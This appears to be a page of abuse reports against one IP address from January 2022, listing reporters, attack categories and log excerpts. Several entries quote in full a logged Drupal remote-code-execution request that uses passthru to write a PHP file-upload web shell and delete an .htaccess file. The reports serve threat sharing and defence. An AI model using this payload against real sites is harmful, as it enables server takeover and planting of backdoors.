gu-alvareza
26 Jan 2022
Drupal.Core.Form.Rendering.Component.Remote.Code.Execution
Web App Attack
backslash
26 Jan 2022
SQL Injection
mangomad
25 Jan 2022
Repeated Apache mod_security rule triggers
Brute-Force
Web App Attack
trbs
25 Jan 2022
A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo ... show more A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo '<?php echo "PHP Uplo..."). ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_32709.php | rm -rf sites/default/files/.htaccess:maputo01_x2b show less
Hacking
SQL Injection
Web App Attack
trbs
25 Jan 2022
A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo ... show more A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo '<?php echo "PHP Uplo..."). ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_32709.php | rm -rf sites/default/files/.htaccess:maputo01_x2b show less
Hacking
SQL Injection
Web App Attack
RoboSOC
25 Jan 2022
Drupal Core Remote Code Execution Vulnerability , PTR: PTR record not found
Hacking
trbs
25 Jan 2022
A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo ... show more A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo '<?php echo "PHP Uplo..."). ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_88162.php | rm -rf sites/default/files/.htaccess:stockholm show less
Hacking
SQL Injection
Web App Attack
UKFast Security
25 Jan 2022
A web attack returned code 200 (success).
Web App Attack
trbs
25 Jan 2022
A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo ... show more A potentially dangerous Request.QueryString value was detected from the client (name[#markup]="echo '<?php echo "PHP Uplo..."). ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_61111.php | rm -rf sites/default/files/.htaccess:paris show less
Hacking
SQL Injection
Web App Attack
UKFast Security
25 Jan 2022
XSS (Cross Site Scripting) attempt.
Web App Attack
syokadmin
22 Jan 2022
(mod_security) mod_security (id:210492) triggered by 103.50.168.200 (BD/Bangladesh/-): 1 in the last ... show more (mod_security) mod_security (id:210492) triggered by 103.50.168.200 (BD/Bangladesh/-): 1 in the last 3600 secs show less
Brute-Force
trbs
22 Jan 2022
Ein möglicherweise gefährlicher Request.QueryString-Wert wurde vom Client (name[#markup]="echo � ... show more Ein möglicherweise gefährlicher Request.QueryString-Wert wurde vom Client (name[#markup]="echo '<?php echo "PHP Uplo...") entdeckt. ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_17395.php | rm -rf sites/default/files/.htaccess:vaduz show less
Hacking
SQL Injection
Web App Attack
trbs
22 Jan 2022
Ein möglicherweise gefährlicher Request.QueryString-Wert wurde vom Client (name[#markup]="echo � ... show more Ein möglicherweise gefährlicher Request.QueryString-Wert wurde vom Client (name[#markup]="echo '<?php echo "PHP Uplo...") entdeckt. ?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo '<?php echo "PHP Uploader - Yacine_Mohamed"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'> </form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "Success!"; } else { echo "Failed to Upload."; } } ?>' | tee sites/default/files/HolaDR7_17395.php | rm -rf sites/default/files/.htaccess:vaduz show less
Hacking
SQL Injection
Web App Attack
UKFast Security
22 Jan 2022
XSS (Cross Site Scripting) attempt.
Web App Attack
joaops
17 Jan 2022
[Aegis] @ 2022-01-17 07:58:55 0000 -> A web attack returned code 200 (success).
Web Spam
Bad Web Bot
Web App Attack